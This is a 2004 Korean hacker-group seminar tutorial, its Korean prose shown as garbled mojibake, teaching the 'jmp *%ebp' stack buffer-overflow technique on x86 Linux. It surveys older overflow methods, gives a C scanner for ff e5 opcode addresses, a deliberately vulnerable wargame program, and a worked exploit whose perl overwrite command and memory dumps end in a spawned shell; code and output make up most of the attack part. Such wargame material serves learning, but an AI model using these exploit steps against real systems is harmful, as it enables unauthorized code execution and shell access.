"Advanced BufferOverflow Attack Skill" -- using jmp *%ebp -- .. 20040108 .. .. CNU aRg0s HackerGroup .. .. ÁöÇö¼®(binish) .. #_INDEX_# 1. ¹öÆÛ¿À¹öÇÃ·Î¿ì °ø°Ý±â¹ýÀÇ ¹ßÀü 2. jmp *%ebp ±â¹ý ¼Ò°³ 3. jmp *%ebp ±â¹ýÀ» ÀÌ¿ëÇÑ °ø°Ý ¿¹ 4. Âü°í 5. µå¸®´Â ¸»¾¸ #_¹öÆÛ¿À¹öÇÃ·Î¿ì °ø°Ý±â¹ýÀÇ ¹ßÀü_# Phrack 49È£¿¡ Aleph1ÀÌ "Smashing The Stack For Fun And Profit"À» ¹ßÇ¥ÇÏ¸é¼ BOF¿¡ ´ëÇÑ °ø°Ý±â¹ýÀÌ ÁÖµÈ °ü½É»ç·Î ¶°¿À¸£±â ½ÃÀÛÇß½À´Ï´Ù. Ãʱâ BOF´Â ¸®ÅϾîµå·¹½º(Return Address:ÀÌÇÏ ret)¸¦ ½©ÄÚµå ÁÖ¼Ò·Î µ¤¾î¾º¿òÀ¸·Î °ø°ÝÀÌ ÀÌ·ç¾îÁ³½À´Ï´Ù. Áï EGG½©À̶ó°í ºÒ¸®´Â ÇÁ·Î±×·¥À» ½ÇÇà½ÃŲ ÈÄ ret¸¦ EGG½©ÀÇ ÁÖ¼Ò°ªÀ¸·Î ´Ü¼øÈ÷ µ¤¾î¾º¿ì´Â ¹æ¹ýÀÔ´Ï´Ù. ÀÌ·± ¹æ¹ýÀÌÈÄ ¿©·¯°¡Áö ¹öÆÛ¿À¹öÇÃ·Î¿ì °ø°Ý±â¹ýÀÌ ¹ßÀüÇÏ°Ô µÇ¾ú½À´Ï´Ù. x01. Frame Pointer Overflow ÇÁ·¹ÀÓ Æ÷ÀÎÅÍ ¿À¹öÇÃ·Î¿ì ±â¹ýÀº ´ÜÁö 1¹ÙÀÌÆ®ÀÇ ¿À¹öÇ÷οìÀÏ ¶§ ¾²ÀÌ´Â ¹æ¹ýÀÔ´Ï´Ù. ÇÁ·Î±×·¥ ½ÇÇàÁß ½ºÅÿµ¿ª¿¡¼ ebp°¡ popµÉ¶§ ±× °ªÀÌ +4µÇ´Â °ÍÀ» ÀÌ¿ëÇÕ´Ï´Ù. º¸Åë ebpÀÇ ½ÃÀÛÁÖ¼Ò°¡ xbfff·Î ½ÃÀÛÇϱ⶧¹®¿¡ EGGÀÇ ÁÖ¼Ò(xbfff·Î ½ÃÀÛ)¿Í ¸Â¾Æ¶³¾îÁö¶§¹®¿¡ °¡´ÉÇÕ´Ï´Ù. x02. .dtors Overflow (with FSB) main()ÇÔ¼ö°¡ exit(0)¿¡ ±¸¾Ö¾øÀÌ Á¾·áµÉ ¶§ Âü°íÇÏ´Â .dtors¿µ¿ª(Á¤È®È÷´Â .dtors+4)À» ½©ÄÚµå ÁÖ¼Ò·Î µ¤¾î¾º¿ì´Â ±â¹ýÀÔ´Ï´Ù. ÀÌ ¹æ¹ýÀº FSB(Format String Bug)¿Í ÇÔ²² ¾º¿©Áý´Ï´Ù. x03. GOT Overflow (with FSB) À§ÀÇ .dtors Overflow´Â exit(0)´ë½Å¿¡ _exit(0)À» ÀÌ¿ëÇÏ¸é ¹æÁöÇÒ ¼ö ÀÖ½À´Ï´Ù. ±×·¸Áö¸¸ GOT¶ó´Â ¿µ¿ªÀ» µ¤¾î¾º¿òÀ¸·Î½á ¶ÇÇÑ ¿À¹öÇ÷ο츦 ¼öÇàÇÒ ¼ö ÀÖ½À´Ï´Ù. ¹°·Ð ÀÌ ¹æ¹ýµµ FSB¿Í ÇÔ²² ¾º¿©Áý´Ï´Ù. x04. OMEGA Project Lamagra¶ó´Â ¿Ü±¹ÇØÄ¿(¼Ò¹®¿¡ ÀÇÇÑ ¸Å¿ì ¾î¸®´Ù°í ÇÔ)¿¡ ÀÇÇؼ °³¹ßµÈ ±â¹ýÀÔ´Ï´Ù. ±âÁ¸ÀÇ ret¸¦ ½©ÄÚµå·Î µ¤¾î¾º¿ì´Â ´ë½Å system()ÀÇ ÁÖ¼Ò¸¦ ret·Î µ¤¾î¾º¿òÀ¸·Î½á system("/bin/sh");¸¦ ½ÇÇà½ÃÄÑ ½©À» ȹµæÇÕ´Ï´Ù. x05. Return-To-Lib(fake_ebp) ÀÎÀÚ¸¦ ¿äÇÏÁö ¾Ê´Â ÇÔ¼ö¸¦ ¿¬¼ÓÀûÀ¸·Î È£ÃâÇÏ´Â ÇÁ·Î±×·¥ÀÇ È帧À» ÀÌ¿ëÇÑ °ø°Ý±â¹ýÀÔ´Ï´Ù. ret¸¦ leaveret ÁÖ¼Ò·Î µ¤¾î¾º¿ì°í ebp¿¡´Â ¹öÆÛÀÇ ½ÃÀÛÁÖ¼Ò¸¦ µ¤¾î¾º¿î ÈÄ ¹öÆÛ¿¡´Â EGGÁÖ¼Ò°ªÀ» µ¤¾î¾º¿òÀ¸·Î½á ebp¸¦ ¼Ó¿©¼(fake_ebp)½©À» ȹµæÇÒ ¼ö ÀÖ½À´Ï´Ù. ¿¹·Î EGGÀÇ ÁÖ¼Ò°¡ 0xEGG, bufÀÇ ÁÖ¼Ò°¡ 0xBUF, leaveretÀÇ ÁÖ¼Ò°¡ 0xLEAVERETÀ϶§, [0xEGG][0xBUF][0xLEAVERET] buf ebp ret À§¿Í °°ÀÌ µ¤¾î¾º¿òÀ¸·Î½á Á¤»óÀûÀ¸·Î leaveÇÑ ÈÄ Âü°íÇÏ´Â ebp(->eip)¸¦ µû¶ó°¡°Ô µÇ°í, ebp¸¦ bufÀÇ ½ÃÀÛÁÖ¼Ò·Î ¼Ó¿´±â¶§¹®¿¡ bufÀÇ ½ÃÀÛÁÖ¼Ò·Î µ¹¾Æ°¡°ÔµÇ¾î¼ ½©ÀÌ ¶ß°Ô µË´Ï´Ù. x06. jmp *%ebp À̹ø ¼¼¹Ì³ª¿¡¼ ÀÚ¼¼È÷ ¾Ë¾Æº¸·Á´Â ±â¹ýÀÔ´Ï´Ù. #_jmp *%ebp ±â¹ý ¼Ò°³_# jmp *%ebp ±â¹ýÀº °£´ÜÈ÷ ¸»Çؼ ret¿¡ jmp *%ebp°ªÀ» µ¤¾î¾º¿öÁÖ´Â ¹æ¹ýÀÔ´Ï´Ù. Áï º¹±ÍÇÒ¶§ ebp·Î jmpÇÏ°Ô µË´Ï´Ù. °íÀü±â¹ý¿¡¼± ½©ÄÚµå ÁÖ¼Ò·Î Á¡ÇÁÇß¾ú½À´Ï´Ù. ¹°·Ð ebp´Â ¿ì¸®°¡ Á¶ÀÛÇÒ ¼ö ÀÖÀ¸¸ç ebp´Â EGG¸¦ °¡¸®Å°°í Àֱ⶧¹®¿¡ ½©À» ȹµæÇÏ°Ô µË´Ï´Ù. ±×·¸´Ù¸é ÀÌÁ¦ jmp *%ebp¸¦ ¾î¶»°Ô ÁÖ¼Ò°ªÀ¸·Î Ç¥ÇöÇÒ ¼ö ÀÖ´ÂÁö¸¦ ¾Ë¾Æ³»¾ß ÇÕ´Ï´Ù. ret¿¡ jmp *%ebp¶ó°í ÀÔ·ÂÇÒ ¼ö´Â ¾ø±â¶§¹®ÀÔ´Ï´Ù :) µû¶ó¼ ¾Æ·¡¿Í °°Àº ¼Ò½º¸¦ Çϳª ÀÛ¼ºÇؼ ÀÌ °ªÀ» ¿ì¼± Çí»ç°ªÀ¸·Î ¾Ë¾ÆºÃ½À´Ï´Ù. /* jmp *%ebp Äڵ带 ã±âÀ§ÇÑ ¼Ò½º by binish */ /* test.c */ main(int argc, char *argv[], char *env[]) { unsigned long get_esp(void) { __asm__("movl %esp,%eax"); __asm__("jmp *%ebp"); } exit(0); } À§ ¼Ò½º¸¦ ÄÄÆÄÀÏÇÑ ÈÄ objdump·Î ÇØ´çÄڵ带 ã¾Ò½À´Ï´Ù. [binish@zeus beist]$ objdump -d test | more . . . 08048324 <get_esp.0>: 8048324: 55 push %ebp 8048325: 89 e5 mov %esp,%ebp 8048327: 83 ec 04 sub $0x4,%esp 804832a: 89 4d fc mov %ecx,0xfffffffc(%ebp) 804832d: 89 e0 mov %esp,%eax 804832f: ff e5 jmp *%ebp //HERE!! 8048331: c9 leave 8048332: c3 ret 8048333: 90 nop . . . HERE!!¿¡¼ ¾Ë ¼ö ÀÖµíÀÌ jmp *%ebp´Â xffxe5ÀÇ ¿¬¼ÓµÈ °ªÀ¸·Î ³ªÅ¸³ªÁý´Ï´Ù. µû¶ó¼ ÀÌ xffxe5°¡ ³ªÅ¸³ª´Â ¿µ¿ªÀÇ °ªÀ» ã¾Æ³¿À¸·Î½á jmp *%ebp°ªÀ» ¾Ë¾Æ³¾ ¼ö ÀÖ½À´Ï´Ù. /* xff¿Í xe5°¡ ¿¬¼ÓÀûÀ¸·Î ³ªÅ¸³ª´Â ¸Þ¸ð¸®¿µ¿ªÀ» ã¾Æ³»¼ ÇØ´ç ÁÖ¼Ò°ªÀ» Ãâ·Â */ /* by Null@Root */ #include <stdio.h> #include <stdlib.h> #include <signal.h> unsigned int i=0; unsigned int a=0; unsigned char *p; void de(int j) { printf("rnGot SIGSEGV:"); printf("%prn",p+a); a++; exit(0); } main(int argc, char* argv[]) { if(argc < 2) { printf("%s <start address for searching 0xffe4>n", argv[0]); exit(0); } sscanf(argv[1], "%x", &i); printf("Using %xn", i); p=(unsigned char *)i; signal(SIGSEGV,de); foo(); } int foo() { while((unsigned int)p+a < 0xbfffffff) { fflush(stdout); if( (*(p+a)==0xff) && (*(p+a+1)==0xe5) ) { printf("found it!! addr:%pn",p+a); a+=2; foo(); } a++; } exit(0); } [binish@zeus beist]$ ./findesp 0x42000000 Using 42000000 found it!! addr:0x4211aa57 found it!! addr:0x4211ccd3 found it!! addr:0x4211da7b found it!! addr:0x4211e36f found it!! addr:0x4212999f Got SIGSEGV:0x4212f000 0x42000000Àº ¶óÀ̺귯¸® ¿µ¿ªÀÇ ½ÃÀÛÁÖ¼Ò(?)ÀÔ´Ï´Ù. 0xbfffffff(½ºÅÃÀÇ ³¡)±îÁö °Ë»öÇؼ, xff¿Í xe5°¡ ¹ß°ßµÉ½Ã ÇØ´ç ÁÖ¼Ò°ªÀ» Ãâ·ÂÇØÁÖ°í ÀÖ½À´Ï´Ù. Áï À§¿¡¼ Ãâ·ÂµÈ 5°³ÀÇ ÁÖ¼Ò°ªÁß Çϳª¸¦ ret·Î µ¤¾î¾º¿î´Ù¸é jmp *%ebp°¡ ÀϾ°ÔµË´Ï´Ù. ±×·¸´Ù¸é ÀÌÁ¦ Ãë¾àÇÑ ÇÁ·Î±×·¥À» ¿¹·Î µé¾î ÀÌ ±â¹ýÀ» ÀÌ¿ëÇÑ ½©È¹µæÀ» ÇÏ°Ú½À´Ï´Ù. #_jmp *%ebp ±â¹ýÀ» ÀÌ¿ëÇÑ °ø°Ý ¿¹_# /* This wargame is made by beist (http://beist.org) */ #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { char buf[4]; if(argc != 2) { printf("argc only 2n"); return 0; } if(strlen(argv[0])!=3) { printf("argv0 length only 3n"); return 0; } if(strlen(argv[1])!=12) { printf("argv1 length only 12n"); return 0; } if(argv[1][11]=='xbf') { printf("welcome to blackholen"); return 0; } memset(buf, 0x00, 4); strncpy(buf, argv[1], 12); memset(buf, 0x00, strlen(argv[1])/2); } À§ ¼Ò½º´Â beist°¡ ¸¸µç BOF Ãë¾àÁ¡ÀÌ ÀÖ´Â ÇÁ·Î±×·¥ÀÔ´Ï´Ù. strncpy(buf, argv[1], 12); ¸¦ ÅëÇؼ bufÀÇ Å©±â°¡ 4¹ÙÀÌÆ®Àε¥ ÀÌ ºÎºÐ¿¡ 12¹ÙÀÌÆ®¸¦ µ¤¾î¾º¿ì°Ô ÇÔÀ¸·Î½á ÀÚ¿¬ÀûÀ¸·Î BOF°¡ ÀϾÁö¸¸ if(argv[1][11]=='xbf') ¸¦ ÅëÇؼ ¹Ù·Î EGG½©À» ȹµæ(°íÀü±â¹ý)ÇÒ ¼ö ¾ø°Ô ÇÏ¿´°í, (EGG½©ÀÇ ½ÃÀÛÁÖ¼Ò´Â xbfffÀÔ´Ï´Ù. µû¶ó¼ argv[1][11]ÀÌ xbf°¡ µË´Ï´Ù) memset(buf, 0x00, strlen(argv[1])/2); ¸¦ ÅëÇؼ 6¹ÙÀÌÆ®¸¦ NULL·Î ¸¸µé¾î¹ö¸³´Ï´Ù. µû¶ó¼ fake_ebpµµ ÅëÇÏÁö ¾Ê½À´Ï´Ù. ¹°·Ð ÀÌ ¹æ¹ýÀº OMEGA ±â¹ýÀ» ÀÌ¿ëÇÏ¸é ½©À» ȹµæÇÒ ¼ö ÀÖÀ¸³ª ¼¼¹Ì³ªÀÇ ÃÊÁ¡¿¡ ¸ÂÃß¾î jmp *%ebp ±â¹ýÀ» ÀÌ¿ëÇϵµ·Ï ÇÏ°Ú½À´Ï´Ù. [binish@zeus beist]$ ./2 AAAAAAAAAAAA 0xbffffb04 00 00 00 00 00 00 41 41 41 41 41 41 02 00 00 00 ......AAAAAA.... ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~ 0xbffffb14 54 fb ff bf 60 fb ff bf b8 24 01 40 02 00 00 00 T...`....$.@.... 0xbffffb24 4c 83 04 08 00 00 00 00 6d 83 04 08 fc 85 04 08 L.......m....... 0xbffffb34 02 00 00 00 54 fb ff bf c4 82 04 08 4c 87 04 08 ....T.......L... 0xbffffb44 50 a9 00 40 4c fb ff bf 0c 02 01 40 02 00 00 00 P..@L......@.... Segmentation fault À§ÀÇ ¿¹¿¡¼Ã³·³ A(41)¸¦ 12°³ ÀÔ·ÂÇÒ °æ¿ì buf[0-3]¿Í ebp[2-3]°¡ NULL(0x00)·Î ä¿öÁö°Ô µË´Ï´Ù. ±×¸®°í ebp[0-1]¿Í ret´Â A(41)·Î ä¿öÁö°ÔµÇ¼ Segmentation fault°¡ ÀϾ°Ô µË´Ï´Ù. ÀÌÁ¦ À§¿¡¼ ¾Ë¾Æ³½ jmp *%ebp °ª(5°³)Áß¿¡¼ Çϳª(4212999f)¸¦ ÅÃÇؼ ret·Î µ¤¾î¾º¿ï°ÍÀÌ°í, EGG¸¦ ¶ç¿ö¼ ±× ÁÖ¼Ò°ªÀ¸·Î ebp¸¦ µ¤¾î¾º¿ìµµ·Ï ÇÏ°Ú½À´Ï´Ù. [00 00 00 00][00 00 ff bf][ jmp *%ebp ] <--- buf ---><--- ebp ---><--- ret ---> [binish@zeus beist]$ ./egg Using address: 0xbffffae8 [binish@zeus beist]$ ./env bffff307 [binish@zeus beist]$ perl -e 'system "./2","AAAAAAxffxbfx9fx99x12x42"' 0xbffff114 00 00 00 00 00 00 ff bf 9f 99 12 42 02 00 00 00 ...........B.... ~~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~~~~~ NULL ebp ret(jmp *%ebp) 0xbffff124 64 f1 ff bf 70 f1 ff bf b8 24 01 40 02 00 00 00 d...p....$.@.... 0xbffff134 4c 83 04 08 00 00 00 00 6d 83 04 08 fc 85 04 08 L.......m....... 0xbffff144 02 00 00 00 64 f1 ff bf c4 82 04 08 4c 87 04 08 ....d.......L... 0xbffff154 50 a9 00 40 5c f1 ff bf 0c 02 01 40 02 00 00 00 P..@......@.... [binish@zeus beist]$ ps PID TTY STAT TIME COMMAND 13515 ? S 0:00 -bash 13779 ? S 0:00 ./egg 13780 ? S 0:00 /bin/bash 13817 ? R 0:00 ps À§¿¡¼ ¾Ë ¼ö ÀÖµíÀÌ EGGÀÇ Á¤È®ÇÑ ½ÃÀÛÁÖ¼Ò´Â 0xbffff307ÀÔ´Ï´Ù. ±×¸®°í ¿ì¸®´Â ¼º°øÀûÀ¸·Î ret¿¡´Â 0x4212999f¸¦ µ¤¾î¾º¿ü°í ebp¿¡´Â 0xbfff0000ÀÌ ¾º¿öÁ³½À´Ï´Ù. µû¶ó¼ ÇÁ·Î±×·¥ÀÌ ÁøÇàµÇ´Ù°¡ retÀÇ 0x4212999f¸¦ ¸¸³ª°ÔµÇ¼ jmp *%ebp°¡ ÀϾ°Ô µÇ°í, ebp¿¡´Â 0xbfff0000ÀÌ ÀԷµǾî ÀÖÀ¸¹Ç·Î 0xbfff0000À¸·Î Á¡ÇÁÇϰԵ˴ϴÙ. ½©ÀÌ ½ÇÇàµÇÁö ¸øÇÑ ÀÌÀ¯´Â EGGÀÇ ÁÖ¼Ò(0xbffff307)¿Í Á¡ÇÁµÈ ÁÖ¼Ò(0xbfff0000)°¡ ³Ê¹« ¸Ö¾î¼ÀÔ´Ï´Ù. ½ºÅÿ¡¼´Â ³ôÀº ¸Þ¸ð¸® ÁÖ¼Ò¿¡¼ ³·Àº ¸Þ¸ð¸® ÁÖ¼Ò·Î µ¥ÀÌÅÍ°¡ ½×ÀÌ°í, ³·Àº ¸Þ¸ð¸® ÁÖ¼Ò¿¡¼ ³ôÀº ¸Þ¸ð¸® ÁÖ¼Ò·Î ÇÁ·Î±×·¥ÀÌ Èê·¯°©´Ï´Ù. µû¶ó¼ EGGÀÇ ½ÃÀÛÁÖ¼Ò°¡ 0xbfff0000º¸´Ù ³·Àº ¹üÀ§¿¡ ÀÖ¾î¾ßÁö ½©À» ȹµæÇÒ ¼ö ÀÖ½À´Ï´Ù. Low Memory Address ------> High Memory Address [ .......0x90(NOP)........shellcode......... ] | +------------------------------------------------ jmp *%ebp(0xbfff0000) À̸¦À§Çؼ´Â EGGÀÇ Å©±â¸¦ ¸Å¿ì ³ÐÇôÁ༠0xbfffº¸´Ù ³·Àº ¸Þ¸ð¸® ÁÖ¼Ò¿¡ ÀÚ¸®¸¦ Àâ°ÔÇÏ¸é µË´Ï´Ù. µû¶ó¼ EGGÀÇ Å©±â¸¦ 65536À¸·Î ³ÐÇô¼(±âÁ¸ 2048) ´Ù½Ã °ø°ÝÇÕ´Ï´Ù. [binish@zeus beist]$ ./egg2 Using address: 0xbffffae8 [binish@zeus beist]$ ./env bffefb07 [binish@zeus beist]$ perl -e 'system "./2","AAAAAAxffxbfx9fx99x12x42"' 0xbffef914 00 00 00 00 00 00 ff bf 9f 99 12 42 02 00 00 00 ...........B.... 0xbffef924 64 f9 fe bf 70 f9 fe bf b8 24 01 40 02 00 00 00 d...p....$.@.... 0xbffef934 4c 83 04 08 00 00 00 00 6d 83 04 08 fc 85 04 08 L.......m....... 0xbffef944 02 00 00 00 64 f9 fe bf c4 82 04 08 4c 87 04 08 ....d.......L... 0xbffef954 50 a9 00 40 5c f9 fe bf 0c 02 01 40 02 00 00 00 P..@......@.... sh-2.05b$ ps PID TTY STAT TIME COMMAND 13515 ? S 0:00 -bash 13933 ? S 0:00 ./egg2 13934 ? S 0:00 /bin/bash 13961 ? S 0:00 perl -e system "./2","AAAAAAxffxbfx9fx99x12x42" 13962 ? S 0:00 /bin/sh 13963 ? R 0:00 ps À§¿¡¼ º¸´Â°Íó·³ EGGÀÇ ½ÃÀÛÁÖ¼Ò°¡ 0xbffefb07ÀÔ´Ï´Ù. Áï Á¡ÇÁµÇ´Â ebpÀÇ ÁÖ¼Ò(0xbfff)º¸´Ù ³·Àº ¸Þ¸ð¸® ¿µ¿ª¿¡ ÀÚ¸®Àâ°í Àֱ⶧¹®¿¡(¹°·Ð NOP·Î ½ÃÀÛµÊ) ½©À» ȹµæÇÒ ¼ö ÀÖ½À´Ï´Ù. ¾Æ¸¶µµ NOPÀÇ ¾î´À ÇÑ ¿µ¿ªÀ¸·Î Á¡ÇÁµÇ¾úÀ»°Å°í NOP¸¦ Ÿ°í È帣´Ù°¡ ½©Äڵ带 ¸¸³ª°Ô µÇ¾úÀ»°Ì´Ï´Ù^^ #_Âü°í_# [1] Null@Root "Jmp *%esp, Call *%esp ¸¦ ÀÌ¿ëÇÑ Buffer Overflow Exploit Á¦ÀÛ" http://null2root.org/lecture/openbook/JmpEsp_CallEsp.txt [2] BEIST.ORG http://beist.org #_µå¸®´Â ¸»¾¸_# µ¿Çлç·ÎÀÇ MT¿¡ Âü°¡ÇÏÁö ¸øÇϰԵǾî¼(¿ìÁ¤À» ¼±ÅÃÇß½À´Ï´Ù. ÇÏÇÏÇÏ) ÀϹÝÇü½ÄÀÇ ¼¼¹Ì³ª ¾ç½ÄÀ¸·Î ÀÛ¼ºÀ» ÇÏÁö ¾Ê¾Ò½À´Ï´Ù. ¹ßÇ¥ÀÚÀÇ ¼³¸íµµ ºÎ½ÇÇѵ¥´Ù°¡ ¼¼¹Ì³ª ¾ç½ÄÀ¸·Î ¾²°ÔµÇ¸é »ý·«ÀÌ ¸¹¾ÆÁ®¼ ´õ ¾µ¸ð¾ø´Â ¹®¼°¡ µÉ °Í °°¾Ò±â ¶§¹®ÀÔ´Ï´Ù. µû¶ó¼ ÀÌ·¸°Ô ±æ°Ô ¼¼úÇüÀ¸·Î ¹®¼¸¦ ÀÛ¼ºÇß½À´Ï´Ù. ¾çÇعٶø´Ï´Ù. MT Áñ°Ì°Ô ´Ù³à¿À½Ã±¸¿ä Åä¿äÀϳ¯ Çã´Ï³Ý ±¸ÃàÀ» À§ÇØ ´Ù½Ã ¸ðÀԽôÙ. ¹®¼¿¡¼ ¸ð¸£´Â ºÎºÐÀÖÀ¸¸é ½º½º·Î ã¾Æº¸¼Å¼ ¾Ë¾Æº¸½ÅÈÄ¿¡ ±×·¡µµ Á¤ ¸ð¸£°ÚÀ¸¸é ¿¬¶ôÁÖ¼¼¿ä. ´ã¹èÇÑ´ë µå¸®°Ú½À´Ï´Ù. ÈìÈì!